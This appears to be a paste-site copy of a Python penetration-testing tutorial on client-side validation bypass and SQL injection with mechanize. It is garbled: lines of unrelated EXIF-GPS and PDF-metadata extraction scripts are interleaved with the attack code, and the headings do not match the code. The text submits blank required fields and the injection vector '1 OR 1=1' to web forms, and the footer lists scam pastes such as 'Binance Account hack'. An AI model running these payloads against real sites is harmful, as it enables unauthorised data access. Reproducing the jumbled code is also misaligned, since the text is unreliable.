Now, we need to provide the url of our dummy website containing the web form on which we need to bypass validation.
from PIL.ExifTags import TAGS

for root, dir, files in os.walk(str(sys.argv[1])):
url = input("Enter URL ")
	for fp in files:
		if ".JPG" in fp.upper():
			# open a file and extract exif
Now, following lines will set some parenters to true.
			fn = root + "/" + fp
			try:
-----------------------------------
				i = Image.open(fn)
brwsr.set_handle_equiv(True)
				info = i._getexif()
brwsr.set_handle_gzip(True)
				exif = {}
brwsr.set_handle_redirect(True)
				for tag, value in info.items():
brwsr.set_handle_referer(True)
					decoded = TAGS.get(tag, tag)
----------------------------------
					exif[decoded] = value
				# from the exif data, extract gps
				exifGPS = exif['GPSInfo']
Next it will open the web page and print the web form on that page.
				latData = exifGPS[2]
				lonData = exifGPS[4]
				# calculate the lat / long
brwsr.open(url)
				latDeg = latData[0][0] / float(latData[0][1])
for form in brwsr.forms():
				latMin = latData[1][0] / float(latData[1][1])
   print(form)
				latSec = latData[2][0] / float(latData[2][1])
				lonDeg = lonData[0][0] / float(lonData[0][1])
				lonMin = lonData[1][0] / float(lonData[1][1])
Next line of codes will bypass the validations on the given fields.
				lonSec = lonData[2][0] / float(lonData[2][1])
				# correct the lat/lon based on N/E/W/S
------------------------------------
				Lat = (latDeg + (latMin + latSec / 60.0) / 60.0)
brwsr.select_form(nr=0)
				if exifGPS[1] == 'S':
brwsr.form['name'] = ''
					Lat = Lat * -1
brwsr.form['gender'] = ''
				Lon = (lonDeg + (lonMin + lonSec / 60.0) / 60.0)
brwsr.submit()
				if exifGPS[3] == 'W':
------------------------------------
					Lon = Lon * -1
				# print file
The last part of the script can be changed according to the fields of web form on which we want to bypass validation. Here in the above script, we have takentwo fields —‘name’ and ‘gender’ which cannot be left blank (you can see in the coding of web form) but this script will bypass that validation.
				msg = fn + " located at " + str(Lat) + "," + str(Lon)
				print(msg)
			except():
################################################
				pass
# Python Penetration Testing — SQLi Web Attack #

################################################


---------------------------Type This----------------------------------- 
python3 extract-geo-location_from_image.py
The attack can be categorize into the following two types:


- In-band SQL injection (Simple SQLi)

- Inferential SQL injection (Blind SQLi)



All types of SQLi can be implemented by manipulating input data to the application. In the following  examples,  we  are  writing  a  Python  script  to  inject  attack  vectors  to  the application  and  analyze  the  output  to  verify  the  possibility  of  the  attack.  Here,  we are going to use python module named mechanize, which gives the facility of obtaining web forms in a web page and facilitates the submission of input values too. We have also used this module for client-side validation.

---------------------------Type This-----------------------------------
 
The  following Python  script helps submit  forms  and analyze the  response  using mechanize:
nano metadata_extraction_pdf.py
 
---------------------------Paste This-----------------------------------
First of all we need to import the mechanize module.
import warnings
import sys
-----------------------

import mechanize
import string
-----------------------
from PyPDF2 import PdfFileWriter, PdfFileReader
warnings.filterwarnings("ignore")
Now, provide the name of the URL for obtaining the response after submitting the form.

for root, dir, files in os.walk(str(sys.argv[1])):
	for fp in files:
url = input("Enter the full url")
		if ".pdf" in fp:
			fn = root + "/" + fp

The following line of codes will open the url.
			try:

-----------------------------------
				pdfFile = PdfFileReader(open(fn, "rb"))
request = mechanize.Browser()
				# print("title = %s" % (pdfFile.getDocumentInfo().title))
request.open(url)
				title = pdfFile.getDocumentInfo().title#.upper()
-----------------------------------
				author = pdfFile.getDocumentInfo().author#.upper()
				pages = pdfFile.getNumPages()
Now, we need to select the form.
				print()

				if title is not None:
request.select_form(nr=0)
					print("The title of the PDF is: ", title)
				if title is None:
					print("The PDF has no title")
Here,we will setthe column name ‘id’.
				if author is not None:
					print("The autor of the PDF is: ", author)
				if author is None:
request["id"] = "1 OR 1=1"
					print("TThe PDF has no author")
				if pages is not None:
					print("The total pages of the PDF is: ", pages)
Now, we need to submit the form
				if pages is None:
					print("The PDF has no pages")
			except():
response = request.submit()
				pass
content = response.read()

print(content)

--------------------------------

---------------------------Type This----------------------------------- 
The above script will print the response for the POST request. We have submitted an attack vector to break the SQL query and print all the data in the table instead of one row. All the attack vectors will be saved in a text file say vectors.txt. Now, the Python script given below will get those attack vectors from the file and send them to the server one by one. It will also save the output to a file.
python3 metadata_extraction_pdf.py
-----------------------------------------------------------------------

Public Pastes

⭐ FREE giftcards method ON
JavaScript | 5 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 6 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 13 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 14 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 22 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 23 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 30 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 31 min ago | 0.17 KB